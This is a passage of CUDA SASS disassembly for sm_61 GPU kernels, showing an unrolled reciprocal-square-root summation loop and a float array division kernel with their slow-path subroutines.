/*0b10*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*0b18*/ @!P1 BRA 0xb38 ; /* 0xe24000000189000f */
/* 0x001c7400ffa007fd */
/*0b28*/ CAL 0xd78 ; /* 0xe260000024800040 */
/*0b30*/ SYNC ; /* 0xf0f800000007000f */
/*0b38*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/* 0x081fd800fea00ff1 */
/*0b48*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*0b50*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*0b58*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/* 0x001ff400fe0007f6 */
/*0b68*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*0b70*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*0b78*/ SYNC }
/* 0xf0f800000007000f */
/* 0x081fc400fec007f0 */
/*0b88*/ { IADD32I R4, R3, 0xe ; /* 0x1c00000000e70304 */
/*0b90*/ SSY 0xc50 }
/* 0xe29000000b800000 */
/*0b98*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/* 0x001ec400fc4007e6 */
/*0ba8*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0bb0*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*0bb8*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/* 0x001fb420fec007e4 */
/*0bc8*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0bd0*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*0bd8*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/* 0x001ff400ffa007fd */
/*0be8*/ @!P1 BRA 0xc00 ; /* 0xe24000000109000f */
/*0bf0*/ CAL 0xd78 ; /* 0xe260000018000040 */
/*0bf8*/ SYNC ; /* 0xf0f800000007000f */
/* 0x001fd401fe20071d */
/*0c08*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*0c10*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*0c18*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/* 0x001fc000fec207f6 */
/*0c28*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*0c30*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*0c38*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/* 0x001fd800fe0007fd */
/*0c48*/ SYNC }
/* 0xf0f800000007000f */
/*0c50*/ { IADD32I R4, R3, 0xf ; /* 0x1c00000000f70304 */
/*0c58*/ SSY 0xd20 }
/* 0xe29000000c000000 */
/* 0x001f8800fcc207f1 */
/*0c68*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*0c70*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0c78*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/* 0x041fd800fc8007b1 */
/*0c88*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*0c90*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0c98*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/* 0x001ff400ffa007ed */
/*0ca8*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*0cb0*/ @!P1 BRA 0xcd8 ; /* 0xe24000000209000f */
/*0cb8*/ CAL 0xd78 ; /* 0xe26000000b800040 */
/* 0x001c7400ffa007f0 */
/*0cc8*/ { MOV R4, R6 ; /* 0x5c98078000670004 */
/*0cd0*/ SYNC }
/* 0xf0f800000007000f */
/*0cd8*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/* 0x081fd800fea00ff1 */
/*0ce8*/ FMUL.FTZ R5, R10, R4 ; /* 0x5c68100000470a05 */
/*0cf0*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*0cf8*/ FADD.FTZ R6, -R5.reuse, -RZ ; /* 0x5c5930000ff70506 */
/* 0x001ff400fe0007f6 */
/*0d08*/ FFMA R6, R5, R6, R10 ; /* 0x5980050000670506 */
/*0d10*/ { FFMA R4, R6, R4, R5 ; /* 0x5980028000470604 */
/*0d18*/ SYNC }
/* 0xf0f800000007000f */
/* 0x001ff400fe0007f1 */
/*0d28*/ FADD R4, R11, R4 ; /* 0x5c58000000470b04 */
/*0d30*/ { IADD32I R3, R3, 0x10 ; /* 0x1c00000001070303 */
/*0d38*/ @P0 BRA 0x60 }
/* 0xe2400fff3200000f */
/* 0x001f8800fcc207f1 */
/*0d48*/ SHR R3, R0.reuse, 0x1e ; /* 0x3829000001e70003 */
/*0d50*/ ISCADD R2.CC, R0, c[0x0][0x150], 0x2 ; /* 0x4c18810005470002 */
/*0d58*/ IADD.X R3, R3, c[0x0][0x154] ; /* 0x4c10080005570303 */
/* 0x001fb400ffe007f5 */
/*0d68*/ STG.E [R2], R4 ; /* 0xeedc200000070204 */
/*0d70*/ EXIT ; /* 0xe30000000007000f */
/*0d78*/ LOP.AND.NZ P1, RZ, R10, c[0x2][0x4] ; /* 0x4c41300800170aff */
/* 0x001fb400ffa007f0 */
/*0d88*/ { @!P1 MOV R5, R10 ; /* 0x5c98078000a90005 */
/*0d90*/ @!P1 BRA 0xe40 }
/* 0xe24000000a89000f */
/*0d98*/ FSETP.GEU.FTZ.AND P1, PT, R10, RZ, PT ; /* 0x5bbe83800ff70a0f */
/* 0x001fb400ffa007f0 */
/*0da8*/ { @!P1 MOV32I R5, 0x7fffffff ; /* 0x0107fffffff9f005 */
/*0db0*/ @!P1 BRA 0xe40 }
/* 0xe24000000889000f */
/*0db8*/ FSETP.GTU.FTZ.AND P1, PT, |R10|, +INF , PT ; /* 0x36bc83ff80070a8f */
/* 0x001fb400ffa007f0 */
/*0dc8*/ { @P1 FADD.FTZ R5, R10, 1 ; /* 0x3858103f80010a05 */
/*0dd0*/ @P1 BRA 0xe40 }
/* 0xe24000000681000f */
/*0dd8*/ FSETP.NEU.FTZ.AND P1, PT, |R10|, +INF , PT ; /* 0x36bd83ff80070a8f */
/* 0x001c5000fe0007f2 */
/*0de8*/ @P1 FFMA R6, R10, 1.84467440737095516160e+19, RZ ; /* 0x32807fdf80010a06 */
/*0df0*/ { @!P1 MOV R5, R10 ; /* 0x5c98078000a90005 */
/*0df8*/ @P1 MUFU.RSQ R5, R6 }
/* 0x5080000000510605 */
/* 0x081fd800fea00ff1 */
/*0e08*/ @P1 FMUL.FTZ R7, R6, R5 ; /* 0x5c68100000510607 */
/*0e10*/ @P1 FMUL.FTZ R9, R5, 0.5 ; /* 0x3868103f00010509 */
/*0e18*/ @P1 FADD.FTZ R8, -R7.reuse, -RZ ; /* 0x5c5930000ff10708 */
/* 0x001fd800fec007e6 */
/*0e28*/ @P1 FFMA R8, R7, R8, R6 ; /* 0x5980030000810708 */
/*0e30*/ @P1 FFMA R8, R8, R9, R7 ; /* 0x5980038000910808 */
/*0e38*/ @P1 FMUL.FTZ R5, R8, 2.3283064365386962891e-10 ; /* 0x3868102f80010805 */
/* 0x001ffc00ffe007f0 */
/*0e48*/ { MOV R6, R5 ; /* 0x5c98078000570006 */
/*0e50*/ RET }
/* 0xe32000000007000f */
/*0e58*/ BRA 0xe58 ; /* 0xe2400fffff87000f */
/* 0x001f8000fc0007e0 */
/*0e68*/ NOP; /* 0x50b0000000070f00 */
/*0e70*/ NOP; /* 0x50b0000000070f00 */
/*0e78*/ NOP; /* 0x50b0000000070f00 */
...............................
Function : _Z3divPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV R6, RZ ; /* 0x5c9807800ff70006 */
/*0018*/ S2R R3, SR_CTAID.X }
/* 0xf0c8000002570003 */
/* 0x085fd841fe20073f */
/*0028*/ S2R R0, SR_TID.X ; /* 0xf0c8000002170000 */
/*0030*/ XMAD.MRG R2, R3.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270302 */
/*0038*/ XMAD R0, R3.reuse, c[0x0] [0x8], R0 ; /* 0x4e00000000270300 */
/* 0x001f9800fea007f1 */
/*0048*/ XMAD.PSL.CBCC R3, R3.H1, R2.H1, R0 ; /* 0x5b30001800270303 */
/*0050*/ MOV32I R2, 0xffffff00 ; /* 0x010ffffff007f002 */
/*0058*/ MOV R0, R3 ; /* 0x5c98078000370000 */
/* 0x001f9800fca207f1 */
/*0068*/ SHL R8, R0.reuse, 0x2 ; /* 0x3848000000270008 */
/*0070*/ SHR.U32 R7, R0, 0x1e ; /* 0x3828000001e70007 */
/*0078*/ IADD R4.CC, R8, c[0x0][0x148] ; /* 0x4c10800005270804 */
/* 0x0002d800fe0007e2 */
/*0088*/ IADD.X R5, R7, c[0x0][0x14c] ; /* 0x4c10080005370705 */
/*0090*/ { IADD R8.CC, R8, c[0x0][0x140] ; /* 0x4c10800005070808 */
/*0098*/ LDG.E R5, [R4] }
/* 0xeed4200000070405 */
/* 0x001fd800162007e2 */
/*00a8*/ IADD.X R9, R7, c[0x0][0x144] ; /* 0x4c10080005170709 */
/*00b0*/ LDG.E R12, [R8] ; /* 0xeed420000007080c */
/*00b8*/ IADD32I R2, R2, 0x10 ; /* 0x1c00000001070202 */
/* 0x001fd821ffa007ed */
/*00c8*/ ISETP.NE.AND P1, PT, R2, RZ, PT ; /* 0x5b6b03800ff7020f */
/*00d0*/ CAL 0x810 ; /* 0xe260000073800040 */
/*00d8*/ IADD32I R5, R0, 0x1 ; /* 0x1c00000000170005 */
/* 0x081fd800fea207f1 */
/*00e8*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*00f0*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*00f8*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/* 0x001fc000fcc007f1 */
/*0108*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*0110*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*0118*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/* 0x0002d800fe0000b2 */
/*0128*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*0130*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*0138*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/* 0x081fc400fec10ffd */
/*0148*/ CAL 0x810 ; /* 0xe26000006c000040 */
/*0150*/ IADD32I R5, R0, 0x2 ; /* 0x1c00000000270005 */
/*0158*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/* 0x001fc440fec007f5 */
/*0168*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*0170*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*0178*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/* 0x0002c800fe0007e6 */
/*0188*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*0190*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0198*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/* 0x043ff40016c007f0 */
/*01a8*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*01b0*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*01b8*/ CAL 0x810 ; /* 0xe260000065000040 */
/* 0x001fd440fe2007f6 */
/*01c8*/ IADD32I R5, R0, 0x3 ; /* 0x1c00000000370005 */
/*01d0*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*01d8*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/* 0x001f9800fe2207f6 */
/*01e8*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*01f0*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*01f8*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/* 0x001fc000164007f0 */
/*0208*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0210*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*0218*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/* 0x001fd821ffa000b6 */
/*0228*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*0230*/ CAL 0x810 ; /* 0xe26000005d800040 */
/*0238*/ IADD32I R5, R0, 0x4 ; /* 0x1c00000000470005 */
/* 0x081fd800fea207f1 */
/*0248*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*0250*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*0258*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/* 0x001fc000fcc007f1 */
/*0268*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*0270*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*0278*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/* 0x0002d800fe0000b2 */
/*0288*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*0290*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*0298*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/* 0x081fc400fec10ffd */
/*02a8*/ CAL 0x810 ; /* 0xe260000056000040 */
/*02b0*/ IADD32I R5, R0, 0x5 ; /* 0x1c00000000570005 */
/*02b8*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/* 0x001fc440fec007f5 */
/*02c8*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*02d0*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*02d8*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/* 0x0002c800fe0007e6 */
/*02e8*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*02f0*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*02f8*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/* 0x043ff40016c007f0 */
/*0308*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*0310*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*0318*/ CAL 0x810 ; /* 0xe26000004f000040 */
/* 0x001fd440fe2007f6 */
/*0328*/ IADD32I R5, R0, 0x6 ; /* 0x1c00000000670005 */
/*0330*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*0338*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/* 0x001f9800fe2207f6 */
/*0348*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*0350*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*0358*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/* 0x001fc000164007f0 */
/*0368*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0370*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*0378*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/* 0x001fd821ffa000b6 */
/*0388*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*0390*/ CAL 0x810 ; /* 0xe260000047800040 */
/*0398*/ IADD32I R5, R0, 0x7 ; /* 0x1c00000000770005 */
/* 0x081fd800fea207f1 */
/*03a8*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*03b0*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*03b8*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/* 0x001fc000fcc007f1 */
/*03c8*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*03d0*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*03d8*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/* 0x0002d800fe0000b2 */
/*03e8*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*03f0*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*03f8*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/* 0x081fc400fec10ffd */
/*0408*/ CAL 0x810 ; /* 0xe260000040000040 */
/*0410*/ IADD32I R5, R0, 0x8 ; /* 0x1c00000000870005 */
/*0418*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/* 0x001fc440fec007f5 */
/*0428*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*0430*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*0438*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/* 0x0002c800fe0007e6 */
/*0448*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*0450*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0458*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/* 0x043ff40016c007f0 */
/*0468*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*0470*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*0478*/ CAL 0x810 ; /* 0xe260000039000040 */
/* 0x001fd440fe2007f6 */
/*0488*/ IADD32I R5, R0, 0x9 ; /* 0x1c00000000970005 */
/*0490*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*0498*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/* 0x001f9800fe2207f6 */
/*04a8*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*04b0*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*04b8*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/* 0x001fc000164007f0 */
/*04c8*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*04d0*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*04d8*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/* 0x001fd821ffa000b6 */
/*04e8*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*04f0*/ CAL 0x810 ; /* 0xe260000031800040 */
/*04f8*/ IADD32I R5, R0, 0xa ; /* 0x1c00000000a70005 */
/* 0x081fd800fea207f1 */
/*0508*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*0510*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*0518*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/* 0x001fc000fcc007f1 */
/*0528*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*0530*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*0538*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/* 0x0002d800fe0000b2 */
/*0548*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*0550*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*0558*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/* 0x081fc400fec10ffd */
/*0568*/ CAL 0x810 ; /* 0xe26000002a000040 */
/*0570*/ IADD32I R5, R0, 0xb ; /* 0x1c00000000b70005 */
/*0578*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/* 0x001fc440fec007f5 */
/*0588*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*0590*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*0598*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/* 0x0002c800fe0007e6 */
/*05a8*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*05b0*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*05b8*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/* 0x043ff40016c007f0 */
/*05c8*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*05d0*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*05d8*/ CAL 0x810 ; /* 0xe260000023000040 */
/* 0x001fd440fe2007f6 */
/*05e8*/ IADD32I R5, R0, 0xc ; /* 0x1c00000000c70005 */
/*05f0*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*05f8*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/* 0x001f9800fe2207f6 */
/*0608*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*0610*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*0618*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/* 0x001fc000164007f0 */
/*0628*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0630*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*0638*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/* 0x001fd821ffa000b6 */
/*0648*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*0650*/ CAL 0x810 ; /* 0xe26000001b800040 */
/*0658*/ IADD32I R5, R0, 0xd ; /* 0x1c00000000d70005 */
/* 0x081fd800fea207f1 */
/*0668*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*0670*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*0678*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/* 0x001fc000fcc007f1 */
/*0688*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*0690*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*0698*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/* 0x0002d800fe0000b2 */
/*06a8*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*06b0*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*06b8*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/* 0x081fc400fec10ffd */
/*06c8*/ CAL 0x810 ; /* 0xe260000014000040 */
/*06d0*/ IADD32I R5, R0, 0xe ; /* 0x1c00000000e70005 */
/*06d8*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/* 0x001fc440fec007f5 */
/*06e8*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*06f0*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*06f8*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/* 0x0002c800fe0007e6 */
/*0708*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*0710*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0718*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/* 0x043ff40016c007f0 */
/*0728*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*0730*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*0738*/ CAL 0x810 ; /* 0xe26000000d000040 */
/* 0x001fd440fe2007f6 */
/*0748*/ IADD32I R5, R0, 0xf ; /* 0x1c00000000f70005 */
/*0750*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*0758*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/* 0x001f9800fe2207f6 */
/*0768*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*0770*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*0778*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/* 0x001fc000164007f0 */
/*0788*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0790*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*0798*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/* 0x001fc421ffa000b6 */
/*07a8*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*07b0*/ CAL 0x810 ; /* 0xe260000005800040 */
/*07b8*/ FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/* 0x081fc400ffa007f0 */
/*07c8*/ { IADD32I R0, R0, 0x10 ; /* 0x1c00000001070000 */
/*07d0*/ @P1 BRA 0x60 }
/* 0xe2400fff8881000f */
/*07d8*/ SHR R0, R3.reuse, 0x1e ; /* 0x3829000001e70300 */
/* 0x001fd400fc4007e6 */
/*07e8*/ ISCADD R4.CC, R3, c[0x0][0x150], 0x2 ; /* 0x4c18810005470304 */
/*07f0*/ IADD.X R5, R0, c[0x0][0x154] ; /* 0x4c10080005570005 */
/*07f8*/ STG.E [R4], R6 ; /* 0xeedc200000070406 */
/* 0x001ff400fda007ff */
/*0808*/ EXIT ; /* 0xe30000000007000f */
/*0810*/ FCHK.DIVIDE P0, R12, R5 ; /* 0x5c88000000570c00 */
/*0818*/ @P0 BRA 0x890 ; /* 0xe24000000700000f */
/* 0x083fd800e3a007f0 */
/*0828*/ { FADD.FTZ R7, -R5, -RZ ; /* 0x5c5930000ff70507 */
/*0830*/ MUFU.RCP R4, R5 }
/* 0x5080000000470504 */
/*0838*/ FFMA R9, R4.reuse, R7, c[0x2][0x0] ; /* 0x5180038800070409 */
/* 0x281fd800fec007f6 */
/*0848*/ FFMA R4, R4, R9, R4 ; /* 0x5980020000970404 */
/*0850*/ FFMA R9, R12, R4, RZ ; /* 0x59807f8000470c09 */
/*0858*/ FFMA R10, R7.reuse, R9, R12.reuse ; /* 0x598006000097070a */
/* 0x001fc000fcc007f6 */
/*0868*/ FFMA R10, R4, R10, R9 ; /* 0x5980048000a7040a */
/*0870*/ FFMA R7, R7, R10, R12 ; /* 0x5980060000a70707 */
/*0878*/ { FFMA R4, R4, R7, R10 ; /* 0x5980050000770404 */
/* 0x001fd800fe2007ff */
/*0888*/ RET }
/* 0xe32000000007000f */
/*0890*/ MOV R9, R12 ; /* 0x5c98078000c70009 */
/*0898*/ MOV R8, R5 ; /* 0x5c98078000570008 */
/* 0x001fc000ffe007fd */
/*08a8*/ CAL 0x8b8 ; /* 0xe260000000800040 */
/*08b0*/ RET ; /* 0xe32000000007000f */
/*08b8*/ { BFE.U32 R5, R8, 0x817 ; /* 0x3800000081770805 */
/* 0x001fd400fe2007f6 */
/*08c8*/ SSY 0xa20 }
/* 0xe290000015000000 */
/*08d0*/ IADD32I R12, R5, -0x1 ; /* 0x1c0ffffffff7050c */
/*08d8*/ BFE.U32 R7, R9, 0x817 ; /* 0x3800000081770907 */
/* 0x001fb400fd8007e1 */
/*08e8*/ ISETP.GT.U32.AND P0, PT, R12, 0xfd, PT ; /* 0x366803800fd70c07 */
/*08f0*/ IADD32I R11, R7, -0x1 ; /* 0x1c0ffffffff7070b */
/*08f8*/ ISETP.GT.U32.OR P0, PT, R11, 0xfd, P0 ; /* 0x366820000fd70b07 */
/* 0x001fc400ffa007f0 */
/*0908*/ { @!P0 MOV R4, RZ ; /* 0x5c9807800ff80004 */
/*0910*/ @!P0 SYNC }
/* 0xf0f800000008000f */
/*0918*/ FSET.GTU.FTZ.AND R4, |R9|, +INF , PT ; /* 0x30cc03ff80070904 */
/* 0x001ff400fda007e6 */
/*0928*/ FSET.GTU.FTZ.AND R10, |R8|, +INF , PT ; /* 0x30cc03ff8007080a */
/*0930*/ LOP.OR.NZ P0, RZ, R4, R10 ; /* 0x5c40320000a704ff */
/*0938*/ @P0 BRA 0xcd8 ; /* 0xe24000003980000f */
/* 0x001ff400fda007f6 */
/*0948*/ MOV R10, c[0x2][0x4] ; /* 0x4c9807880017000a */
/*0950*/ LOP3.LUT.NZ P0, RZ, R8, R10, R9, 0xc8 ; /* 0x5be004bc80a708ff */
/*0958*/ @!P0 BRA 0xcc0 ; /* 0xe24000003608000f */
/* 0x001fc000fda007f1 */
/*0968*/ FSET.NEU.FTZ.AND RZ.CC, |R9|, +INF , PT ; /* 0x30cd83ff800709ff */
/*0970*/ FSETP.NEU.FTZ.AND P3, PT, |R8|, +INF , PT ; /* 0x36bd83ff8007089f */
/*0978*/ { FSETP.NEU.FTZ.AND P0, PT, |R9|, +INF , PT ; /* 0x36bd83ff80070987 */
/* 0x001fb400fda007ed */
/*0988*/ @!P3 BRA CC.EQ, 0xcc0 }
